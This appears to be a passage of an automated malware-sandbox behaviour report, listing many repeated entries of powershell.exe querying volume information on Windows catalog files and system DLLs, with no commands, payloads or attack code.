Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
